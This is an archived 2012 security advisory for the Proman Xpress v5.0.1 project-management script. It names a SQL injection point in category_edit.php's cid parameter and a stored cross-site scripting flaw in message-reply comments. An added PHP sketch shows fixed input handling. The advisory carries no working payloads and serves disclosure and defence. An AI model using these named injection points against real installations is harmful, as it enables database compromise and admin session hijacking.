Proman Xpress v5.0.1 - Multiple Web Vulnerabilities
2012-05-09T00:00:00
ID: 1337DAY-ID-18238 | Type: zdt | Reporter: the_storm | Modified: 2012-05-09T00:00:00
Description
Exploit for php platform in category web applications
Title:
======
Proman Xpress v5.0.1 - Multiple Web Vulnerabilities
Introduction:
=============
Proman Xpress v5.0.1 is a super project management script coded in PHP & MySQL. It's highly customizable and
is used across industries.
No Encryption.
No Callback.
Separate login for clients.
Easy management.
Add/edit/delete projects.
Unlimited project category.
Unlimited image upload.
Ajax based interface.
Complete messaging system.
File attachment system.
Active/ inactive projects.
Assign different parts to staffs.
Client to admin message interface.
Staff to admin message interface.
Set project time period.
Add/edit/delete clients.
Add/edit/delete Staffs.
Template based architecture.
(Copy of the Vendor Homepage: http://itechscripts.com/proman_xpress.html )
Details:
========
1.1
A remote SQL injection vulnerability is detected in the Proman Xpress 2012 Q2 content management system.
The vulnerability allows a remote attacker or a local low-privileged user account to inject and execute their own SQL commands
on the affected application DBMS. Successful exploitation of the vulnerability results in DBMS and application compromise.
The vulnerability is located on the username post method.
Vulnerable Module(s):
[+] Category Edit [category_edit.php?cid=]
1.2
A persistent input validation vulnerability is detected in the Proman Xpress 2012 Q2 content management system.
The bugs allow remote attackers to inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user interaction. The bug is located in the comment section of
the message reply function.
Vulnerable Module(s):
[+] Replying for a Message - Comments
# 0day.today [2018-02-19] #
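
Hardened handling of the two inputs named in 1.1 and 1.2, as an added example (not code from Proman Xpress or from the original advisory): the `cid` parameter of `category_edit.php` is validated as an integer and bound to a prepared statement, and a stored reply comment is HTML-encoded when it is rendered. The `categories` table, its columns, the function names and the in-memory SQLite database are assumptions made so the sketch runs stand-alone; the application itself uses MySQL.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database (assumption: the real
// schema is not shown in the advisory). SQLite in memory keeps this offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO categories (id, name) VALUES (1, 'Design'), (2, 'Build')");

/**
 * 1.1: look up a category by the cid request parameter (hypothetical helper).
 * Returns the row, or null when cid is not a positive integer or not found.
 */
function findCategory(PDO $pdo, $rawCid): ?array
{
    // Reject anything that is not a plain positive integer before it reaches SQL.
    $cid = filter_var($rawCid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cid === false) {
        return null;
    }
    // The value is bound as a typed parameter, never concatenated into the statement.
    $stmt = $pdo->prepare('SELECT id, name FROM categories WHERE id = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * 1.2: render a stored reply comment (hypothetical helper). Encoding happens at
 * output time, so markup saved before the fix is neutralised as well.
 */
function renderComment(string $storedComment): string
{
    $safe = htmlspecialchars($storedComment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="comment">' . nl2br($safe) . '</p>';
}

// Constructed inputs: a valid id, a non-numeric cid, and a comment containing markup.
var_dump(findCategory($pdo, '2'));
var_dump(findCategory($pdo, '2 abc'));
echo renderComment('<b>hi</b> & "bye"'), "\n";
```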